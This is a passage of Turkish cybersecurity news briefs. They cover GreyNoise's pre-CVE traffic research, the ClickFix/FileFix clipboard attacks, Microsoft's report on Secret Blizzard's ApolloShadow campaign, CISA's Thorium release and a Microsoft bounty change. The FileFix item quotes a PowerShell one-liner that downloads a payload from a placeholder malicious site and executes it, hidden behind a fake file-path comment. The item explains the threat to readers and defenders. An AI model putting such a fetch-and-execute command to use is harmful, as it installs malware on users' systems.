Bu tür uygulamalar, SMS veya e-posta üzerinden gönderilen doğrulama kodlarına göre çok daha güvenli kabul ediliyor. Çünkü kodlar yerel olarak üretiliyor, kısa sürede geçersiz hale geliyor ve phishing, SIM değişimi veya ortadaki adam (MITM) saldırılarına karşı dayanıklı bir yapı sunuyor.

Proton, bu yeni uygulamasıyla kullanıcıları büyük teknoloji şirketlerinin kapalı ve takip temelli ekosistemlerinden kurtarmayı hedeflediğini belirtti. Kaynak kodunun önümüzdeki haftalarda Proton’un GitHub hesabında yayımlanması bekleniyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber tehdit istihbarat firması GreyNoise, 2024 yılından bu yana topladığı verilerle gerçekleştirdiği analizde, güvenlik açıkları kamuya duyurulmadan önce geçen altı haftalık sürede ağ trafiğinde olağan dışı bir artış olduğunu tespit etti. Şirketin verilerine göre, incelenen olayların %80’inde, CVE (Common Vulnerabilities and Exposures) açıklamaları öncesinde saldırgan faaliyetlerinde ani sıçramalar yaşanıyor.

Araştırmada kullanılan veriler, GreyNoise’un küresel tarama verileri sağlayan Global Observation Grid (GOG) platformundan elde edildi. İstatistiksel güvenilirlik sağlamak adına düşük kaliteli ve gürültülü veriler analiz dışı bırakıldı ve toplam 216 anormal trafik olayı değerlendirmeye alındı. Bu olaylar, aralarında Ivanti, SonicWall, Palo Alto Networks, Fortinet, MikroTik, Citrix ve Cisco gibi sekiz büyük uç ağ cihazı üreticisini kapsıyor.

GreyNoise, “İncelediğimiz 216 trafik artışının %50’si üç hafta içinde, %80’i ise altı hafta içinde yeni bir güvenlik açığı duyurusu ile sonuçlandı.” açıklamasında bulundu.

Eski Açıklar Taranıyor, Yeni Saldırılar Hazırlanıyor

Araştırmacılara göre bu trafik artışları genellikle daha önce bilinen açıklara yönelik taramalardan oluşuyor. Ancak bu taramaların amacı sadece bu eski açıkları sömürmek değil, aynı zamanda yeni zafiyetlerin keşfi ya da ağa açık sistemlerin haritalanması gibi sonraki aşamalar için zemin hazırlamak.

Savunma İçin Erken Uyarı Mekanizması

GreyNoise, bu tür trafik artışlarının savunma ekipleri için bir tür “erken uyarı” niteliği taşıdığını belirtiyor. Bu sayede, bir güvenlik yaması yayınlanmamış olsa dahi sistem yöneticileri önceden hazırlık yapabiliyor, izleme sistemlerini güçlendirebiliyor ve riskli IP’leri kara listeye alabiliyor.

Özellikle devlet destekli tehdit gruplarının, uç nokta cihazlarını ilk erişim ve kalıcılık amacıyla hedef aldığı biliniyor. Bu da ağ üzerindeki anormal hareketliliklerin göz ardı edilmemesi gerektiğini gösteriyor.

Google Project Zero’dan Paralel Adım

Bu gelişmeyle eş zamanlı olarak, Google’ın Project Zero ekibi de önemli bir politika değişikliğini duyurdu. Buna göre yeni bir güvenlik açığı tespit edildiğinde, artık teknik detay verilmeden yalnızca hangi ürünün etkilendiği, ne zaman keşfedildiği ve açıklama süresi gibi temel bilgiler bir hafta içinde kamuoyuyla paylaşılacak. Amaç, yazılım tedarikçileri güncelleme hazırlarken sistem yöneticilerinin savunmasını hızla güçlendirebilmesini sağlamak.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik platformu Keep Aware tarafından yayımlanan yeni bir analiz, ClickFix olarak adlandırılan tarayıcı kaynaklı sosyal mühendislik saldırısının detaylarını ortaya koydu. Bu saldırılar, kullanıcıların farkında olmadan tarayıcıdan panoya kopyalanan zararlı kodları çalıştırmalarına neden olarak sistemin ele geçirilmesine zemin hazırlıyor.

Sessiz Tehdit: ClickFix Nedir

ClickFix saldırıları, genellikle sahte CAPTCHA doğrulamaları gibi kullanıcıdan "bir şeyi düzeltmesi" istenen görseller üzerinden başlatılıyor. Kullanıcı bir öğeye tıkladığında, tarayıcı sessizce panoya zararlı PowerShell komutları kopyalıyor. Ardından kullanıcıya bu kodu terminale yapıştırması gerektiği söyleniyor. Bu işlem, kötü amaçlı yazılımın çalıştırılmasına neden oluyor.

Keep Aware tarafından paylaşılan gerçek bir vaka analizinde, bir kullanıcı arama motoru sonuçlarında karşılaştığı bir siteye tıkladıktan sonra ClickFix saldırısına maruz kaldı. Sayfa, panoya NetSupport Manager uzaktan erişim truva atı içeren PowerShell kodunu kopyaladı ve çalıştırılması yönünde kullanıcıyı yönlendirdi. Keep Aware’ın tarayıcı güvenlik çözümleri sayesinde saldırı gerçekleşmeden engellendi.

Yeni Varyant: FileFix

Haziran 2025'te araştırmacı mr.d0x tarafından belgelenen FileFix, ClickFix’in gelişmiş bir versiyonu olarak ortaya çıktı. FileFix’te kullanıcı, panoya gizlenmiş PowerShell komutlarını doğrudan Windows Dosya Gezgini'nin adres çubuğuna yapıştırmaya ikna ediliyor. Komutun ardından gelen dosya yolu yorum satırı olarak ekleniyor ve tehdit gizleniyor:

Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" # C:\Organization\Internal\Drive\Business-RFP.pdf
  

Bu tür saldırılarda, kullanıcının zararlı kodu fark etmesi zorlaşıyor çünkü adres çubuğu yalnızca dosya yolu kısmını gösteriyor.

Kalıcı Tehdit: RAT ve Stealer Yüklemeleri

ClickFix ve FileFix saldırıları, kullanıcıyı aktif olarak kodu çalıştırmaya yönlendirerek AsyncRAT, Lumma Stealer, DarkGate, DanaBot gibi kötü amaçlı yazılımların sisteme yerleşmesini sağlıyor. Panoya kopyalanan kod, indirilen dosyaları açıyor, çözümleyerek sistemde kalıcılık sağlayan arka kapılar kuruyor.

Koruma Nereden Başlamalı

Uzmanlara göre bu tür saldırılar, klasik antivirüs ve güvenlik duvarı çözümlerini aşabiliyor. Bu nedenle tarayıcı düzeyinde, panoya erişimi izleyen ve zararlı komutları gerçek zamanlı engelleyen çözümler kullanılmalı. Keep Aware, ClickFix ve FileFix saldırılarını tarayıcıda tespit ederek henüz çalıştırılmadan durdurabildiğini belirtiyor.

Tarayıcı Güvenliği Öncelik Haline Geliyor

Keep Aware, bu saldırıların güvenlik stratejilerindeki en büyük açık olan tarayıcı alanını hedef aldığını vurguluyor. Şirket, bu nedenle tarayıcı merkezli güvenlik yaklaşımı geliştirdiklerini ve Black Hat USA 2025 etkinliğinde sunum yapacak dört Startup Spotlight finalistinden biri seçildiklerini açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft, Rusya merkezli siber casusluk grubu Secret Blizzard’ın, Moskova’daki diplomatik temsilcilikleri hedef alan yeni bir siber kampanya yürüttüğünü açıkladı. Grup, yerel internet servis sağlayıcılarının altyapısını kullanarak adversary-in-the-middle (AiTM) saldırıları gerçekleştiriyor.

Microsoft’un daha önce Turla, Waterbug ve Venomous Bear gibi adlarla da takip ettiği bu grup, hedef kullanıcıları sahte Kaspersky antivirüs yükleyicisiyle kandırarak ApolloShadow adlı özel zararlı yazılımı sistemlere yerleştiriyor. Saldırının temel yöntemi, kurbanları captive portal’lara yönlendirmek ve buradan kötü amaçlı dosyaları indirmeye zorlamak.

ApolloShadow sistemlere yüklendikten sonra, sahte bir Kaspersky root sertifikası da kuruyor. Bu sertifika, saldırganların zararlı siteleri meşru gibi göstermesini sağlıyor ve sistemde kalıcı erişim elde etmelerine imkân tanıyor.

Microsoft, “Bu, Secret Blizzard grubunun ISP düzeyinde istihbarat toplama yeteneğini ilk kez doğruladığımız bir örnektir. Rusya’daki yerel internet sağlayıcılarını kullanan diplomatik personel, yüksek risk altındadır.” açıklamasında bulundu.

Saldırı zincirinin Şubat 2025'te tespit edildiği, ancak kampanyanın en azından 2024’ten bu yana aktif olduğu belirtiliyor. Microsoft ayrıca, saldırganların Rusya’daki resmi gözetim altyapısı SORM (System for Operative Investigative Activities) üzerinden AiTM saldırılarını yaygınlaştırdığını belirtti.

Yüksek Profilli Hedeflere Yönelik Sıra Dışı Taktikler

Secret Blizzard, 1996'dan bu yana dünya genelinde 100'den fazla ülkede elçilikleri, devlet kurumlarını ve araştırma merkezlerini hedef alan siber casusluk faaliyetleri yürütüyor. Grup, iki yıl önce ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) tarafından FSB’nin 16. Merkezi ile ilişkilendirilmişti.

Geçmişte, Britney Spears’ın Instagram gönderilerine yazılan yorumlar üzerinden kötü amaçlı yazılımları kontrol ettikleri ve İranlı APT grubu OilRig'in altyapısını kullanarak saldırılarını gizlemeye çalıştıkları tespit edilmişti. Ayrıca, yakın zamanda Pakistanlı Storm-0156 grubunun altyapısını ele geçirerek Ukrayna askeri cihazlarını Starlink bağlantıları üzerinden hedef aldıkları bildirildi.

Secret Blizzard grubunun, ABD Merkez Kuvvetler Komutanlığı (CENTCOM), NASA, Pentagon, Finlandiya Dışişleri Bakanlığı, AB devletleri ve büyükelçiliklerini de hedef aldığı biliniyor.

Microsoft, özellikle diplomatik kurumlar ve yerel ağ altyapısına bağlı çalışan tüm kuruluşlar için ciddi güvenlik önlemleri alınması gerektiğini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), kötü amaçlı yazılım ve dijital adli analiz süreçlerini otomatikleştirmeye yönelik geliştirilen Thorium platformunun açık kaynak olarak yayınlandığını duyurdu. Thorium, kamu, özel sektör ve devlet kurumlarındaki siber güvenlik uzmanlarına yönelik olarak geliştirildi.

Thorium, CISA ile Sandia Ulusal Laboratuvarları iş birliğiyle geliştirildi ve saniyede 1.700'den fazla işlem planlayabilme ve saatlik 10 milyon dosya işleyebilme kapasitesine sahip. Bu altyapı, analiz süreçlerinde yüksek ölçeklenebilirlik ve hız sunuyor.

CISA açıklamasında, “Thorium, ticari, açık kaynaklı ve kuruma özel analiz araçlarını entegre ederek analiz iş akışlarını otomatikleştiriyor. Yazılım analizi, dijital adli inceleme ve olay müdahalesi gibi görevlerde güvenlik ekiplerine kapsamlı destek sağlıyor.” ifadelerine yer verildi.

Thorium’un Temel Özellikleri:

• Açık kaynak, ticari veya özel komut satırı araçlarının Docker görüntüleri olarak kolayca entegre edilmesi
• Araç ve sonuç paylaşımını kolaylaştıran içe/dışa aktarma özellikleri
• Etiketleme ve tam metin aramayla sonuç filtreleme
• Erişim kontrolleri için grup tabanlı yetkilendirme
• Kubernetes ve ScyllaDB entegrasyonu ile ölçeklenebilir yapı

CISA Tehdit Avcılığı Başkan Yardımcısı Jermaine Roebuck, “Thorium’u açık kaynak olarak sunarak, siber güvenlik topluluğunun zararlı yazılım ve adli analiz için gelişmiş araçları daha etkili şekilde kullanmasını sağlıyoruz.” dedi. Roebuck ayrıca, platformun sadece zararlı yazılımlar değil, potansiyel olarak güvenli yazılımlardaki zafiyetleri de analiz etme olanağı sunduğunu vurguladı.

Thorium’a ait kurulum dökümanları ve kaynak kodları CISA’nın resmî GitHub hesabı üzerinden erişime açıldı.

CISA, bu adımı geçtiğimiz yıl açık kaynak olarak yayımladığı Malware Next-Gen analiz sistemi ve bu hafta duyurduğu Eviction Strategies Tool ile destekledi. Ajans ayrıca kritik altyapı tesislerine yönelik ücretsiz güvenlik taramaları sunmaya da devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft, .NET ve ASP.NET Core platformlarındaki güvenlik açıklarını tespit eden araştırmacılar için ödül miktarlarını artırdığını ve hata ödül programının kapsamını genişlettiğini duyurdu. Yeni sistemle birlikte, kritik uzaktan kod çalıştırma ve ayrıcalık yükseltme açıkları için ödül miktarı 40.000 dolara kadar çıkabilecek.

Microsoft’ta Araştırmacı Teşvikleri ve Ödül Programları Kıdemli Yöneticisi Madeline Eckert, yapılan değişikliklerin, .NET güvenlik açıklarının keşfi ve sömürülmesindeki teknik karmaşıklığın daha doğru bir şekilde yansıtılmasını amaçladığını belirtti.